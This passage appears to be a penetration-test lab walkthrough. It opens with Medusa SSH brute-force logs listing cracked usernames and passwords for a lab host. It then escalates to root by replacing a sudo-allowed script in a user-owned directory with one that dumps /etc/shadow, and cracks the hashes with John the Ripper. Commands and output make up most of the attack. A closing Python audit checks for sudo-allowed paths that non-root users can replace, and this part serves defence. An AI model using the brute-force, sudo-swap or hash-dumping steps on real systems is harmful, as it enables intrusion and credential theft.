ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jalvarez Password: 666666 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jayala (24 of 49, 23 complete) Password: michael (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jayala Password: michael [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jbresnahan (25 of 49, 24 complete) Password: Password (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jbresnahan Password: Password [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jdavenport (26 of 49, 25 complete) Password: babyl0n (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jdavenport Password: babyl0n [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jduff (27 of 49, 26 complete) Password: trustno1 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jduff Password: trustno1 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jfranklin (28 of 49, 27 complete) Password: password (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jfranklin Password: password [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: kclemons (29 of 49, 28 complete) Password: killer (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: kclemons Password: killer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: krenfro (30 of 49, 29 complete) Password: gizmodo (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: krenfro Password: gizmodo [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: ktso (31 of 49, 30 complete) Password: computer (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: ktso Password: computer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: kwebber (32 of 49, 31 complete) Password: lifehack (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: kwebber Password: lifehack [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: lmartinez (33 of 49, 32 complete) Password: michelle (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: lmartinez Password: michelle [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: lmorales (34 of 49, 33 complete) Password: master (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: lmorales Password: master [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mbryan (35 of 49, 34 complete) Password: pepper (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mbryan Password: pepper [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mholland (36 of 49, 35 complete) Password: baseball (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mholland Password: baseball [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mnader (37 of 49, 36 complete) Password: soccer (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mnader Password: soccer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mrodriguez (38 of 49, 37 complete) Password: jordan (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mrodriguez Password: jordan [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: myajima (39 of 49, 38 complete) Password: 12345 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: myajima Password: 12345 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: qpowers (40 of 49, 39 complete) Password: 12345678 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: qpowers Password: 12345678 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rdominguez (41 of 49, 40 complete) Password: gawker (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rdominguez Password: gawker [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rjacobson (42 of 49, 41 complete) Password: internet (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rjacobson Password: internet [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rpatel (43 of 49, 42 complete) Password: 0 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rpatel Password: 0 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: sgains (44 of 49, 43 complete) Password: batman (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: sgains Password: batman [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: sjohnson (45 of 49, 44 complete) Password: football (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: sjohnson Password: football [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: strammel (46 of 49, 45 complete) Password: dragon (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: strammel Password: dragon [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: swarren (47 of 49, 46 complete) Password: shadow (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: swarren Password: shadow [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: tdeleon (48 of 49, 47 complete) Password: qwerty (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: tdeleon Password: qwerty [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: tgoodchap (49 of 49, 48 complete) Password: letmein

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: tgoodchap Password: letmein [SUCCESS]
GENERAL: Medusa has finished.

root@kali:~# ssh aadams@192.168.1.120
aadams@192.168.1.120's password:
Linux 2.6.27.27.
aadams@slax:~$
aadams@slax:~$ uname -a
Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz GenuineIntel GNU/Linux
aadams@slax:~$ id
uid=1005(aadams) gid=100(users) groups=100(users)
aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
Sorry, user aadams may not run sudo on slax.
aadams@slax:~$

aadams@slax:~$ cat /etc/group
root:x:0:root
bin:x:1:root,bin
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root,adm
lp:x:7:lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
floppy:x:11:root
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
man:x:15:
audio:x:17:root
video:x:18:root
cdrom:x:19:root
games:x:20:
slocate:x:21:
utmp:x:22:
smmsp:x:25:smmsp
tape:x:26:root
mysql:x:27:
rpc:x:32:
sshd:x:33:sshd
gdm:x:42:
shadow:x:43:
ftp:x:50:
apache:x:80:
messagebus:x:81:
haldaemon:x:82:
plugdev:x:83:root
power:x:84:
pop:x:90:pop
scanner:x:93:
nobody:x:98:nobody
nogroup:x:99:
users:x:100:ccoffee
console:x:101:
admin:x:102:ccoffee

root@kali:~# ssh ccoffee@192.168.1.120
ccoffee@192.168.1.120's password:
Linux 2.6.27.27.
ccoffee@slax:~$

ccoffee@slax:~$ ls -al
total 12
drwx------  3 ccoffee users  120 Jan 13 10:20 ./
dr-xr-xr-x 53 root    root  1040 Jan 13 10:20 ../
-rwx------  1 ccoffee users 3729 Jan 13 10:20 .screenrc*
-rwx------  1 ccoffee users  779 Jan 13 10:20 .xsession*
-rwx------  1 ccoffee users   57 Jan 13 10:20 DONOTFORGET*
drwx------  2 ccoffee users   60 Jan 13 10:20 scripts/

ccoffee@slax:~$ ls -al scripts/
total 4
drwx------ 2 ccoffee users  60 Jan 13 10:20 ./
drwx------ 3 ccoffee users 120 Jan 13 10:20 ../
-rws--x--x 1 root    admin 110 Jan 13 10:20 getlogs.sh*

ccoffee@slax:~$ cat scripts/getlogs.sh
cat: scripts/getlogs.sh: Permission denied
ccoffee@slax:~$ sudo cat scripts/getlogs.sh

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
Sorry, user ccoffee is not allowed to execute '/usr/bin/cat scripts/getlogs.sh' as root on slax.
ccoffee@slax:~$ sudo -l
User ccoffee may run the following commands on this host:
    (root) NOPASSWD: /home/ccoffee/scripts/getlogs.sh

ccoffee@slax:~$ /home/ccoffee/scripts/getlogs.sh
/bin/bash: /home/ccoffee/scripts/getlogs.sh: Permission denied
ccoffee@slax:~$ sudo /home/ccoffee/scripts/getlogs.sh
wrong!

ccoffee@slax:~$ cd scripts
ccoffee@slax:~/scripts$ mv getlogs.sh getlogs.sh.old
ccoffee@slax:~/scripts$ vi getlogs.sh

#!/bin/bash
whoami
id
cat /etc/shadow

ccoffee@slax:~/scripts$ chmod 744 getlogs.sh

ccoffee@slax:~/scripts$ sudo /home/ccoffee/scripts/getlogs.sh
root
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev)

root@kali:~# john shadow1
Loaded 50 password hashes with 50 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
qwerty           (tdeleon)
12345            (myajima)
password         (jfranklin)
123456           (amaynard)
computer         (ktso)
12345678         (qpowers)
abc123           (dgilfillan)
internet         (rjacobson)
shadow           (swarren)
baseball         (mholland)
letmein          (tgoodchap)
michael          (jayala)
dragon           (strammel)
michelle         (lmartinez)
jordan           (mrodriguez)
trustno1         (jduff)
soccer           (mnader)
football         (sjohnson)
batman           (sgains)
iloveyou         (bbanter)
pepper           (mbryan)
jennifer         (dstevens)
master           (lmorales)
monkey           (aspears)
sunshine         (bphillips)
whatever         (aadams)
welcome          (hlovell)
111111           (djohnson)
666666           (jalvarez)
654321           (aheflin)
killer           (kclemons)
princess         (ccoffee)
superman         (bwatkins)
123123           (aweiland)
1234567          (cchisholm)
cheese           (dgrant)
starwars         (dtraylor)
Password         (jbresnahan)
nintendo         (aallen)
passw0rd         (aharp)
blahblah         (dwestling)
pokemon          (jalcantar)
0                (rpatel)
guesses: 43  time: 0:00:01:34 0.00% (3)  c/s: 29442  trying: markey10 - marketio
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

root@kali:~# cat shadow2
root:$1$m6t0Y8xo$qUweOAwTBe99YU2Xbf13h1:16083:0:::::

root@kali:~# john shadow2 --wordlist=/usr/share/wordlists/darkc0de.lst
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
guesses: 0  time: 0:00:00:50 DONE (Mon Jan 13 13:22:46 2014)  c/s: 29222  trying: �migr� - �f

root@kali:~# john shadow2 --wordlist=/usr/share/wordlists/rockyou.txt
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
guesses: 0  time: 0:00:08:10 DONE (Mon Jan 13 13:32:19 2014)  c/s: 29211  trying:      123d - * 7¡Vamos!

That's all.
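
The escalation above works because sudoers grants root execution of a path inside `/home/ccoffee/scripts/`, a directory owned by ccoffee, so the file can be renamed and replaced no matter how the script itself is protected. An audit for that condition, as an added example that is not part of the original post; the function names are hypothetical and the sample input is constructed from the `sudo -l` output shown earlier:

```python
import os
import re
import stat

# Constructed sample: the `sudo -l` output for ccoffee as shown in the walkthrough.
SAMPLE_SUDO_L = """\
User ccoffee may run the following commands on this host:
    (root) NOPASSWD: /home/ccoffee/scripts/getlogs.sh
"""
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?:[A-Z_]+:\s*)*(?P<cmds>/.*)$")

def parse_sudo_l(text):
    """Return (runas, executable_path) pairs from `sudo -l` style output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            for cmd in filter(None, (c.strip() for c in m.group("cmds").split(","))):
                rules.append((m.group("runas"), cmd.split()[0]))  # drop arguments
    return rules

def replaceable_by_non_root(path, trusted_uids=frozenset({0})):
    """Return reasons why an unprivileged user could swap the file at `path`.
    The file and every ancestor directory must be owned by a trusted uid and
    must not be group/world-writable (sticky directories are tolerated).
    Symlinks are not followed; that is a simplification of this example.
    """
    findings = []
    current = os.path.abspath(path)
    while True:
        try:
            st = os.lstat(current)
        except OSError as exc:
            findings.append(f"{current}: cannot stat ({exc.strerror})")
        else:
            if st.st_uid not in trusted_uids:
                findings.append(f"{current}: owned by uid {st.st_uid}")
            loose = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
            sticky = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
            if loose and not sticky and not stat.S_ISLNK(st.st_mode):
                findings.append(f"{current}: group/world-writable")
        parent = os.path.dirname(current)
        if parent == current:
            return findings
        current = parent

def audit(sudo_l_text, trusted_uids=frozenset({0})):
    """Map each sudo-allowed executable to its findings (empty list = OK)."""
    return {p: replaceable_by_non_root(p, trusted_uids) for _, p in parse_sudo_l(sudo_l_text)}
```

On the target host this would report `/home/ccoffee/scripts` and `/home/ccoffee` as owned by a non-root uid; moving the script to a root-owned directory such as `/usr/local/sbin` and updating the sudoers entry clears the finding.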
